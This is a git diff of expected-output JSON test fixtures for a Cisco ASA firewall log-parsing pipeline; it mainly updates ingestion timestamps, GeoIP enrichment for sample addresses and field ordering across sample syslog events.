CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18639,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364566600Z", + "ingested": "2021-12-14T14:36:23.392380031Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18720,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364570800Z", + "ingested": "2021-12-14T14:36:23.392380419Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18801,7 +18801,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364575Z", + "ingested": "2021-12-14T14:36:23.392380815Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18882,7 +18882,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364579600Z", + "ingested": "2021-12-14T14:36:23.392381654Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18963,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364584300Z", + "ingested": "2021-12-14T14:36:23.392382043Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +19044,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364589Z", + "ingested": "2021-12-14T14:36:23.392382435Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19125,7 +19125,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364592700Z", + "ingested": "2021-12-14T14:36:23.392383192Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19206,7 +19206,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364596400Z", + "ingested": "2021-12-14T14:36:23.392383622Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19287,7 +19287,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364601Z", + "ingested": "2021-12-14T14:36:23.392384003Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19368,7 +19368,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364606800Z", + "ingested": "2021-12-14T14:36:23.392384387Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19449,7 +19449,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364612600Z", + "ingested": "2021-12-14T14:36:23.392384777Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19530,7 +19530,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364618400Z", + "ingested": "2021-12-14T14:36:23.392385164Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19611,7 +19611,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364624100Z", + "ingested": "2021-12-14T14:36:23.392385644Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19692,7 +19692,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364628400Z", + "ingested": "2021-12-14T14:36:23.392386078Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19773,7 +19773,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364632900Z", + "ingested": "2021-12-14T14:36:23.392386463Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19854,7 +19854,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364637200Z", + "ingested": "2021-12-14T14:36:23.392386854Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19935,7 +19935,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364642200Z", + "ingested": "2021-12-14T14:36:23.392387238Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20016,7 +20016,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364646700Z", + "ingested": "2021-12-14T14:36:23.392388043Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20097,7 +20097,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364651300Z", + "ingested": "2021-12-14T14:36:23.392388593Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20178,7 +20178,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364655400Z", + "ingested": "2021-12-14T14:36:23.392388980Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20259,7 +20259,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364659400Z", + "ingested": "2021-12-14T14:36:23.392389354Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20340,7 +20340,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364663800Z", + "ingested": "2021-12-14T14:36:23.392389737Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20421,7 +20421,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364667900Z", + "ingested": "2021-12-14T14:36:23.392390117Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20502,7 +20502,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364672Z", + "ingested": "2021-12-14T14:36:23.392390504Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20583,7 +20583,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364675700Z", + "ingested": "2021-12-14T14:36:23.392391090Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20664,7 +20664,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364680200Z", + "ingested": "2021-12-14T14:36:23.392391472Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20745,7 +20745,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364684400Z", + "ingested": "2021-12-14T14:36:23.392391852Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20826,7 +20826,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364688500Z", + "ingested": "2021-12-14T14:36:23.392392260Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -20907,7 +20907,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:31:36.364692900Z", + "ingested": "2021-12-14T14:36:23.392392637Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json index f38b44ec55f..b1cfaed7e01 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-dap-records.log-expected.json @@ -1,34 +1,6 @@ { "expected": [ { - "log": { - "level": "informational" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "ip": "81.2.69.144" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "type": "firewall", "product": "asa", @@ -43,9 +15,28 @@ "81.2.69.144" ] }, + "log": { + "level": "informational" + }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "ip": "81.2.69.144" + }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:10.434308700Z", + "ingested": "2021-12-14T14:36:56.018932055Z", "original": "Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.144, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2", "code": "734001", "kind": "event", @@ -68,7 +59,10 @@ "dap_2" ] } - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json index 70db62062e6..06df5e68ca5 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-filtered.log-expected.json @@ -1,22 +1,16 @@ { "expected": [ { - "process": { - "name": "asa", - "pid": 1234 - }, - "log": { - "level": "debug" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "beats", "product": "asa", "type": "firewall", "vendor": "Cisco" }, + "process": { + "name": "asa", + "pid": 1234 + }, "@timestamp": "2021-01-01T01:00:27.000Z", "ecs": { "version": "1.12.0" @@ -26,12 +20,15 @@ "beats" ] }, + "log": { + "level": "debug" + }, "host": { "hostname": "beats" }, "event": { "severity": 7, - "ingested": "2021-12-09T13:32:10.616159800Z", + "ingested": "2021-12-14T14:36:56.170625119Z", "original": "Jan 1 01:00:27 beats asa[1234]: %ASA-7-999999: This message is not filtered.", "code": "999999", "kind": "event", @@ -45,7 +42,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -72,7 +72,7 @@ }, "event": { "severity": 8, - "ingested": "2021-12-09T13:32:10.616169400Z", + "ingested": "2021-12-14T14:36:56.170627623Z", "original": "Jan 1 01:00:30 beats asa[1234]: %ASA-8-999999: This phony message is dropped due to log level.", "code": "999999", "kind": "event", @@ -146,7 +146,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:10.616194900Z", + "ingested": "2021-12-14T14:36:56.170628084Z", "original": "Jan 1 01:02:12 beats asa[1234]: %ASA-2-106001: Inbound TCP connection denied from 10.13.12.11/45321 to 192.168.33.12/443 flags URG+SYN+RST on interface eth0", "code": "106001", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json index 299a4b82c18..ab94e9534a0 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-hostnames.log-expected.json @@ -45,7 +45,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:10.900273500Z", + "ingested": "2021-12-14T14:36:56.443349711Z", "original": "Oct 10 2019 10:21:36 localhost: %ASA-6-302021: Teardown ICMP connection for faddr target.destination.hostname.local/10005 gaddr 10.0.55.66/0 laddr Prod-host.name.addr/0", "code": "302021", "kind": "event", @@ -107,7 +107,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:10.900281300Z", + "ingested": "2021-12-14T14:36:56.443351777Z", "original": "Jun 04 2011 21:59:52 MYHOSTNAME : %ASA-6-302021: Teardown ICMP connection for faddr 192.168.2.15/0 gaddr 192.168.2.134/57808 laddr 192.168.2.134/57808 type 8 code 0", "code": "302021", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json index 2eda35d4c50..2f08c6f88d6 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-not-ip.log-expected.json @@ -7,20 +7,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -73,7 +67,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.119441600Z", + "ingested": "2021-12-14T14:36:56.653383328Z", "original": "\u003c165\u003eOct 04 2019 15:27:55: %ASA-5-106100: access-list AL-DMZ-LB-IN denied tcp LB-DMZ/WHAT-IS-THIS-A-HOSTNAME-192.168.2.244(27218) -\u003e OUTSIDE/81.2.69.144(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", @@ -138,7 +132,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.119449700Z", + "ingested": "2021-12-14T14:36:56.653386031Z", "original": "Jan 1 2020 10:42:53 localhost : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr mydomain.example.net/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -220,7 +214,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.119455300Z", + "ingested": "2021-12-14T14:36:56.653386545Z", "original": "Jan 2 2020 11:33:20 localhost : %ASA-4-338204: Dynamic filter dropped greylisted TCP traffic from eth0:10.10.10.1/1234 (source.example.net/11234) to wan:172.24.177.3/80 (www.example.org/80), destination malicious address resolved from dynamic list: example.org, threat-level: high, category: malware", "code": "338204", "kind": "event", diff --git a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json index 686cc9c87b3..833642a7854 100644 --- a/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco/data_stream/asa/_dev/test/pipeline/test-sample.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.534937100Z", + "ingested": "2021-12-14T14:36:57.032435283Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -118,7 +118,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:32:11.534941700Z", + "ingested": "2021-12-14T14:36:57.032437545Z", "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.1.2.30/63016 dst outside:192.168.0.8/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3aab522, 0x0]", "code": "106023", "kind": "event", @@ -188,7 +188,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.534947900Z", + "ingested": "2021-12-14T14:36:57.032437941Z", "original": "Apr 15 2014 09:34:34 EDT: %ASA-session-5-106100: access-list acl_in permitted tcp inside/10.1.2.16(2241) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -266,7 +266,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534954500Z", + "ingested": "2021-12-14T14:36:57.032438298Z", "original": "Apr 24 2013 16:00:28 INT-FW01 : %ASA-6-106100: access-list inside denied udp inside/172.29.2.101(1039) -\u003e outside/192.168.2.10(53) hit-cnt 1 first hit [0xd820e56a, 0x0]", "code": "106100", "kind": "event", @@ -343,7 +343,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534960200Z", + "ingested": "2021-12-14T14:36:57.032438634Z", "original": "Apr 24 2013 16:00:27 INT-FW01 : %ASA-6-106100: access-list inside permitted udp inside/172.29.2.3(1065) -\u003e outside/192.168.2.57(53) hit-cnt 144 300-second interval [0xe982c7a4, 0x0]", "code": "106100", "kind": "event", @@ -413,7 +413,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534965800Z", + "ingested": "2021-12-14T14:36:57.032438971Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4952 to outside:192.168.2.130/12834", "code": "305011", "kind": "event", @@ -484,7 +484,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534971700Z", + "ingested": "2021-12-14T14:36:57.032439303Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743274 for outside:192.168.2.43/443 (192.168.2.43/443) to outside:10.123.3.42/4952 (10.123.3.42/12834)", "code": "302013", "kind": "event", @@ -556,7 +556,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534977400Z", + "ingested": "2021-12-14T14:36:57.032439649Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic UDP translation from outside:10.123.1.35/52925 to outside:192.168.2.130/25882", "code": "305011", "kind": "event", @@ -631,7 +631,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534983100Z", + "ingested": "2021-12-14T14:36:57.032439997Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302015: Built outbound UDP connection 89743275 for outside:192.168.2.222/53 (192.168.2.43/53) to outside:10.123.1.35/52925 (10.123.1.35/25882)", "code": "302015", "kind": "event", @@ -703,7 +703,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534988700Z", + "ingested": "2021-12-14T14:36:57.032440327Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from outside:10.123.3.42/4953 to outside:192.168.2.130/45392", "code": "305011", "kind": "event", @@ -776,7 +776,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.534994300Z", + "ingested": "2021-12-14T14:36:57.032440655Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743276 for outside:192.168.2.1/80 (192.168.2.1/80) to outside:10.123.3.42/4953 (10.123.3.130/45392)", "code": "302013", "kind": "event", @@ -850,7 +850,7 @@ "event": { "severity": 6, "duration": 5025000000000, - "ingested": "2021-12-09T13:32:11.535000400Z", + "ingested": "2021-12-14T14:36:57.032441189Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 89743275 for outside:192.168.2.222/53 to inside:10.123.1.35/52925 duration 1:23:45 bytes 140", "code": "302016", "kind": "event", @@ -923,7 +923,7 @@ "event": { "severity": 6, "duration": 36000000000000, - "ingested": "2021-12-09T13:32:11.535006100Z", + "ingested": "2021-12-14T14:36:57.032441536Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302016: Teardown UDP connection 666 for outside:192.168.2.222/53 user1 to inside:10.123.1.35/52925 user2 duration 10:00:00 bytes 9999999", "code": "302016", "kind": "event", @@ -991,7 +991,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535011800Z", + "ingested": "2021-12-14T14:36:57.032441866Z", "original": "Jun 04 2011 21:59:52 FJSG2NRFW01 : %ASA-6-302021: Teardown ICMP connection for faddr 172.24.177.29/0 gaddr 192.168.132.46/17233 laddr 192.168.132.46/17233", "code": "302021", "kind": "event", @@ -1058,7 +1058,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535017400Z", + "ingested": "2021-12-14T14:36:57.032442214Z", "original": "Apr 29 2013 12:59:50: %ASA-6-305011: Built dynamic TCP translation from inside:192.168.3.42/4954 to outside:192.168.0.130/10879", "code": "305011", "kind": "event", @@ -1131,7 +1131,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:32:11.535021700Z", + "ingested": "2021-12-14T14:36:57.032442548Z", "original": "Apr 29 2013 12:59:50: %ASA-6-302013: Built outbound TCP connection 89743277 for outside:192.168.0.17/80 (192.168.0.17/80) to inside:192.168.3.42/4954 (10.0.0.130/10879)", "code": "302013", "kind": "event", @@ -1195,7 +1195,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535026900Z", + "ingested": "2021-12-14T14:36:57.032442999Z", "original": "Apr 30 2013 09:22:33: %ASA-2-106007: Deny inbound UDP from 192.168.0.66/12981 to 10.1.2.60/53 due to DNS Query", "code": "106007", "kind": "event", @@ -1261,7 +1261,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535031200Z", + "ingested": "2021-12-14T14:36:57.032443336Z", "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2006) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1331,7 +1331,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535035200Z", + "ingested": "2021-12-14T14:36:57.032443682Z", "original": "Apr 30 2013 09:22:38: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49734) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1401,7 +1401,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535039700Z", + "ingested": "2021-12-14T14:36:57.032444019Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49735) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1471,7 +1471,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535045400Z", + "ingested": "2021-12-14T14:36:57.032444391Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49736) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1541,7 +1541,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535049400Z", + "ingested": "2021-12-14T14:36:57.032444718Z", "original": "Apr 30 2013 09:22:39: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49737) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1611,7 +1611,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535053900Z", + "ingested": "2021-12-14T14:36:57.032445173Z", "original": "Apr 30 2013 09:22:40: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49738) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1681,7 +1681,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535058800Z", + "ingested": "2021-12-14T14:36:57.032445603Z", "original": "Apr 30 2013 09:22:41: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.46(49746) -\u003e outside/192.168.0.88(40443) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1751,7 +1751,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535063200Z", + "ingested": "2021-12-14T14:36:57.032445936Z", "original": "Apr 30 2013 09:22:47: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2007) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1821,7 +1821,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535067400Z", + "ingested": "2021-12-14T14:36:57.032446284Z", "original": "Apr 30 2013 09:22:48: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.13(43013) -\u003e dmz/192.168.33.31(25) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1891,7 +1891,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:32:11.535071Z", + "ingested": "2021-12-14T14:36:57.032446613Z", "original": "Apr 30 2013 09:22:56: %ASA-5-106100: access-list acl_in permitted tcp inside/10.0.0.16(2008) -\u003e outside/192.168.0.89(2000) hit-cnt 1 first hit [0x71a87d94, 0x0]", "code": "106100", "kind": "event", @@ -1957,7 +1957,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535075400Z", + "ingested": "2021-12-14T14:36:57.032446941Z", "original": "Apr 30 2013 09:23:02: %ASA-2-106006: Deny inbound UDP from 192.168.2.66/137 to 10.1.2.42/137 on interface inside", "code": "106006", "kind": "event", @@ -2017,7 +2017,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:32:11.535081200Z", + "ingested": "2021-12-14T14:36:57.032447268Z", "original": "Apr 30 2013 09:23:03: %ASA-2-106007: Deny inbound UDP from 192.168.2.66/12981 to 